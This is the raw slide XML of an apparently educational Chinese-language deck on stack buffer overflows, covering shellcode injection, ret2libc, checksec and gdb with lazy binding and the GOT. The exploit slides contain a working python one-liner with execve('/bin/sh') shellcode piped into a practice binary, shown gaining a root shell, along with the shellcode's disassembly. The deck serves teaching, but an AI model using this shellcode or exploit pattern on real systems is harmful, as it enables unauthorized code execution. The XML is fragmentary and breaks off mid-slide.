                </a:endParaRP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0xffffd590:	xor    eax,eax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0xffffd592:	push   eax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0xffffd593:	push   0x68732f2f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0xffffd598:	push   0x6e69622f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0xffffd59d:	mov    ebx,esp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0xffffd59f:	push   eax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0xffffd5a0:	push   ebx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0xffffd5a1:	mov    ecx,esp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0xffffd5a3:	mov    al,0xb</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr defTabSz="127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800">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr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   0xffffd5a5:	int    0x80</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1300" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="605539" y="546264"/>
                <a:ext cx="6407308" cy="4318192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="63500" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="FF26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302" name="shellcode"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7380594" y="2113457"/>
              <a:ext cx="203585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shellcode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3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5" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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7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308" name="root@Ubuntu : tmp ➤ (python -c &quot;print 'a'*13+'\x90\xd5\xff\xff'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'&quot;;cat)|./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575766" y="5300979"/>
            <a:ext cx="14503394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4D2F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9600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00A500"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B12513"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00A3B0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>➤ 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(python -c "print 'a'*13+'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x90\xd5\xff\xff</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'";cat)|./easy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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whoami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root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chemeClr val="accent4">
                    <a:lumOff val="-106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uid=0(root) gid=0(root) groups=0(root)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629"/>
            <a:ext cx="6338254" cy="33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練習(no ASLR, no NX)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找出溢出點</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641684" indent="-641684">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>使用shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641684" indent="-641684">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Get shell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Demo"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10340821" y="6075679"/>
            <a:ext cx="3689659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ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9773414" y="6075679"/>
            <a:ext cx="4824473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ret2libc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ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="3502780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ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1316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317" name="Return to Libc…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="7205217" cy="241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Return to Libc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libc ≈ dll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linux所使用的動態函數庫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="root@Ubuntu : tmp ➤ ldd ./bof…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282723" y="6532880"/>
            <a:ext cx="13805854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ldd ./bof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linux-gate.so.1 =&gt;  (0xf7fd8000)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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xf7e10000)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/lib/ld-linux.so.2 (0xf7fd9000)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ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="3502780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ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1321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322" name="當程式有NX保護時…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="5748487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當程式有NX保護時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已知Libc位址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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="root@Ubuntu : tmp ➤ checksec ./bof…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8387018" y="5345429"/>
            <a:ext cx="7597265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checksec ./bof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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>] '/tmp/bof'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Arch:     i386-32-little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RELRO:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C7B939"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial RELRO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Stack:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canary found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NX:       </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NX enabled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F7509D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    PIE:      </a:t>
            </a:r>
            <a:r>
              <a:t>No PIE (0x8048000)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="可利用已知的libc function位址，在控制EIP時設計出一個Function Call。"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4880441" y="9739630"/>
            <a:ext cx="1461041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可利用已知的libc function位址，在控制EIP時設計出一個Function Call。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Lazy binding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5715110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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1327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328" name="linux elf加速動態連結的方式…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197672" y="5720079"/>
            <a:ext cx="15975956" cy="540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spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>linux elf加速動態連結的方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>在第一次呼叫函數時會從GOT跳進_dl_runtime_resolve()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>取得該函數在libc中的位址後寫回GOT表中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>在第二次以後呼叫函數會直接從GOT表取得位址直接進入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>libc的實際位址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Lazy binding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5715110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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23357664" y="564820"/>
            <a:ext cx="36496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332" name="root@Ubuntu : tmp ➤ gdb ./bof…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567259" y="4716779"/>
            <a:ext cx="11236783" cy="679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gdb ./bof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disas main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Dump of assembler code for function main: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0x0804846b &lt;+0&gt;:     lea    ecx,[esp+0x4]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0x0804846f &lt;+4&gt;:     and    esp,0xfffffff0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            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            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            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0x0804848e</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;+35&gt;:    call   0x8048330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            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            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            .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0x080484b3 &lt;+72&gt;:    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End of assembler dump.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b*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0804848e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333" name="[gdb]&gt; r…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10536608" y="576580"/>
            <a:ext cx="12490733" cy="128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FC126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[gdb]&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5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[----------------------------------registers-----------------------------------]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EAX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0xc3a00ff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EBX</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x0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ECX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd610</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd634</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0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ESI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EDI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5f8</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0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ESP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0xffffd5d0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0xc3a00ff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EIP</a:t>
            </a:r>
            <a:r>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804848e</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;main+35&gt;:      call   0x8048330 &lt;gets@plt&gt;)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EFLAGS</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x296 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>carry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PARITY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ADJUST</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zero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SIGN</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trap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INTERRUPT</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direction</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:t>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[-------------------------------------code-------------------------------------]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0x8048487 &lt;main+28&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub    esp,0xc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0x804848a &lt;main+31&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lea    eax,[ebp-0xd]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0x804848d &lt;main+34&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   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45C897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 b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt; 0x804848e &lt;main+35&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>call   0x8048330 &lt;gets@plt&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0"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0x8048493 &lt;main+40&gt;: add    esp,0x10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0x8048496 &lt;main+43&gt;: mov    eax,0x0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0x804849b &lt;main+48&gt;: mov    edx,DWORD PTR [ebp-0xc]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0x804849e &lt;main+51&gt;: xor    edx,DWORD PTR gs:0x14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Guessed arguments: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arg[0]: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0xc3a00ff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arg[1]: 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arg[2]: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:  add    ebx,0x1835b0)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arg[3]: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:        add    edi,0x1)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[------------------------------------stack-------------------------------------]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0000| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d0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0xc3a00ff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0004| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5d4</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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0008| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:     add    ebx,0x1835b0)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0012| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5dc</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:   add    edi,0x1)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0016| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5e0</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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0020| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e4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0xffffd6a4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0xffffd7d0</a:t>
            </a:r>
            <a:r>
              <a:t> ("/tmp/bof")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0024| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e8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0xffffd6ac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0xffffd7d9</a:t>
            </a:r>
            <a:r>
              <a:t> ("XDG_SESSION_ID=288")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0028| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5ec</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x4c0c3a00 ('')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[------------------------------------------------------------------------------]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Legend: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:t>, value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Breakpoint 1, 0x0804848e in main ()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x/wx 0x804a00c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0x804a00c:      0x08048336</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="[gdb]&gt; ni…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10541000" y="571500"/>
            <a:ext cx="12490733" cy="1167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rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ni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[----------------------------------registers-----------------------------------]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EAX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0xc3a0061 ('a')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EBX</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x0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ECX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0xf7fc25a0</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0xfbad2288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EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xf7fc387c</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0 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ESI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EDI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5f8</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0 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ESP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0xffffd5d0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0xc3a0061 ('a')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EIP</a:t>
            </a:r>
            <a:r>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x8048493</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;main+40&gt;:      add    esp,0x10)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EFLAGS</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x246 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>carry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PARITY</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adjust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ZERO</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sign</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trap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INTERRUPT</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direction</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:t>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[-------------------------------------code-------------------------------------]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0x804848a &lt;main+31&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lea    eax,[ebp-0xd]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0x804848d &lt;main+34&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   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84345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   0x804848e &lt;main+35&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>call   0x8048330 &lt;gets@plt&gt;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=&gt; 0x8048493 &lt;main+40&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add    esp,0x10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0x8048496 &lt;main+43&gt;: mov    eax,0x0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0x804849b &lt;main+48&gt;: mov    edx,DWORD PTR [ebp-0xc]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0x804849e &lt;main+51&gt;: xor    edx,DWORD PTR gs:0x14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7B93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   0x80484a5 &lt;main+58&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>je     0x80484ac &lt;main+65&gt;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[------------------------------------stack-------------------------------------]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0000| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d0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0xc3a0061 ('a')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0004| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5d4</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1 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0008| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:     add    ebx,0x1835b0)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0012| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5dc</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:   add    edi,0x1)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0016| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5e0</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1 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0020| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e4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0xffffd6a4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0xffffd7d0</a:t>
            </a:r>
            <a:r>
              <a:t> ("/tmp/bof")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0024| </a:t>
